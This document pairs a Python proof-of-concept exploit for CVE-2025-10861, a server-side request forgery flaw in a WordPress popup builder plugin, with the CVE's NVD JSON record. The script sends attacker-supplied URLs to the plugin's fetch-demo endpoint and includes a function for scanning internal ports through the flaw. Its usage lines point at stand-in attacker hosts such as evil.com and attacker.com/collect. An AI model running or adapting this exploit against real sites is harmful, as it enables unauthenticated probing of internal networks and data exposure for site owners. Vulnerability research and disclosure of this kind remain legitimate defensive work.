CVE-2025-10861

import requests import sys def exploit_ssrf(target_url, attacker_controlled_url): """ PoC for CVE-2025-10861 - SSRF in Popup Builder WordPress Plugin This exploits the insufficient URL validation in the plugin's FetchDemo endpoint. The vulnerable parameter allows attackers to make the server request arbitrary URLs. Usage: python exploit.py http://target-wordpress-site.com http://evil.com/malicious-endpoint Note: For authorized security testing only. """ # Vulnerable endpoint path (found in plugin code analysis) vulnerable_endpoint = "/wp-json/popup-builder/v1/fetch-demo" # Alternative vulnerable parameters params = { "url": attacker_controlled_url, # Attacker-controlled URL parameter # "action": "fetch_demo", # "demo_url": attacker_controlled_url, } try: print(f"[*] Target: {target_url}") print(f"[*] Attacker URL: {attacker_controlled_url}") # Send the malicious request response = requests.get( target_url + vulnerable_endpoint, params=params, timeout=10, allow_redirects=False ) print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Body: {response.text[:500]}") return response except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None def scan_internal_port(target_url, internal_host, port): """ Use SSRF to scan internal ports """ internal_url = f"http://{internal_host}:{port}" print(f"[*] Scanning {internal_host}:{port}") params = {"url": internal_url} try: response = requests.get( target_url + "/wp-json/popup-builder/v1/fetch-demo", params=params, timeout=5 ) if response.status_code != 0: print(f"[!] Port {port} is OPEN") return True except: pass return False if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python exploit.py <target_url> <attacker_url>") print("Example: python exploit.py http://victim.com http://attacker.com/collect") sys.exit(1) target = sys.argv[1] attacker = sys.argv[2] exploit_ssrf(target, attacker)

{"cve": {"id": "CVE-2025-10861", "sourceIdentifier": "[email protected]", "published": "2025-10-24T12:15:37.340", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Popup builder with Gamification, Multi-Step Popups, Page-Level Targeting, and WooCommerce Triggers plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.1.4. This is due to insufficient validation on the URLs supplied via the URL parameter. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services, as well as conduct network reconnaissance. The vulnerability was partially patched in version 2.1.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/popup-builder-block/tags/2.1.2/includes/Routes/FetchDemo.php#L15", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/popup-builder-block/tags/2.1.2/includes/Routes/FetchDemo.php#L35", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3369146/", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3379308/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5f4767b5-5dd6-4a2a-b44a-5297432286b1?source=cve", "source": "[email protected]"}]}}